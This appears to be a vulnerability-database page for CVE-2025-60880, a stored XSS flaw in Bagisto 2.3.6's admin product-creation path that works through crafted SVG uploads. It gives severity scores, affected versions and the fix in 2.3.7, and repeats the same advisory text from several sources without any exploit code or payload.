CVE-2025-60880
published 2025-10-10CVE-2025-60880: An authenticated stored XSS vulnerability exists in the Bagisto 2.3.6 admin panel's product creation path, allowing an attacker to upload a crafted SVG file…
PriorityP339high8.3CVSS 3.1
AVNACLPRHUIRSCCHILAH
EPSS
0.39%
30.7th percentile
An authenticated stored XSS vulnerability exists in the Bagisto 2.3.6 admin panel's product creation path, allowing an attacker to upload a crafted SVG file containing malicious JavaScript code. This vulnerability can be exploited by an authenticated admin user to execute arbitrary JavaScript in the browser, potentially leading to session hijacking, data theft, or unauthorized actions.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| bagisto | bagisto | >= 2.3.6 < 2.3.7 | 2.3.7 |
| webkul | bagisto | — | — |
Stop checking back — get the weekly exploitation signal.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
Bagisto is vulnerable to XSS through Admin Panel's product creation path
ghsa·2025-10-10
CVE-2025-60880 [HIGH] CWE-79 Bagisto is vulnerable to XSS through Admin Panel's product creation path
Bagisto is vulnerable to XSS through Admin Panel's product creation path
An authenticated stored XSS vulnerability exists in the Bagisto 2.3.6 admin panel's product creation path, allowing an attacker to upload a crafted SVG file containing malicious JavaScript code. This vulnerability can be exploited by an authenticated admin user to execute arbitrary JavaScript in the browser, potentially leading to session hijacking, data theft, or unauthorized actions.
OSV
Bagisto is vulnerable to XSS through Admin Panel's product creation path
osv·2025-10-10
CVE-2025-60880 [HIGH] Bagisto is vulnerable to XSS through Admin Panel's product creation path
Bagisto is vulnerable to XSS through Admin Panel's product creation path
An authenticated stored XSS vulnerability exists in the Bagisto 2.3.6 admin panel's product creation path, allowing an attacker to upload a crafted SVG file containing malicious JavaScript code. This vulnerability can be exploited by an authenticated admin user to execute arbitrary JavaScript in the browser, potentially leading to session hijacking, data theft, or unauthorized actions.
No detection rules found.
No public exploits indexed.
No writeups or analysis indexed.
2025-10-10
Published